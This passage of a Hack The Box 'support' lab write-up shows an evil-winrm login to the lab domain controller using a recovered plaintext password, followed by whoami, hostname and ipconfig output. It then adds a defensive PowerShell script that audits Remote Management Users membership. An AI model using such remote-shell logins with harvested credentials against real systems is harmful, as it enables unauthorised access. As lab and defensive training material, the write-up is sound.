WinRM


Now that I have compromised a valid domain account that is a member of the Remote Management Users group, I can establish a WinRM session to the target system.

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ evil-winrm -i dc.support.htb -u support -p Ironside47pleasure40Watchful
 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support
*Evil-WinRM* PS C:\Users\support\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\support\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.11.174
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Initial foothold established on the target system as the support account via evil-winrm.
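
The session above was possible because the account is a member of the Remote Management Users group. As an added example (not part of the original writeup), the following PowerShell audits that group from the defender's side, listing every account that can open a WinRM session through it. It assumes the RSAT ActiveDirectory module, a domain-joined host, and an arbitrary 180-day password-age threshold.

```powershell
# Added example: review accounts that gain WinRM access through the
# built-in "Remote Management Users" group.
# Assumptions: RSAT ActiveDirectory module, domain-joined host,
# 180-day password-age threshold (tune to local policy).
Import-Module ActiveDirectory

$staleBefore = (Get-Date).AddDays(-180)
$props = 'Enabled', 'PasswordLastSet', 'PasswordNeverExpires',
         'LastLogonDate', 'adminCount'

# -Recursive flattens nested groups so indirect members are not missed.
$report = Get-ADGroupMember -Identity 'Remote Management Users' -Recursive |
    Where-Object { $_.objectClass -eq 'user' } |
    ForEach-Object {
        $u = Get-ADUser -Identity $_.distinguishedName -Properties $props

        $flags = @()
        if (-not $u.Enabled)         { $flags += 'disabled-but-still-member' }
        if ($u.PasswordNeverExpires) { $flags += 'password-never-expires' }
        if ($u.PasswordLastSet -and $u.PasswordLastSet -lt $staleBefore) {
            $flags += 'stale-password'
        }
        # Accounts that are not protected admin accounts but still hold
        # remote-shell rights deserve a justification.
        if (-not $u.adminCount)      { $flags += 'non-admin-with-winrm' }

        [pscustomobject]@{
            SamAccountName  = $u.SamAccountName
            Enabled         = $u.Enabled
            PasswordLastSet = $u.PasswordLastSet
            LastLogonDate   = $u.LastLogonDate
            Flags           = $flags -join ', '
        }
    }

$report | Sort-Object SamAccountName | Format-Table -AutoSize -Wrap
```

Any shared or service account that appears in this report can open a remote shell with nothing more than its password, so each entry should have a documented reason for being there.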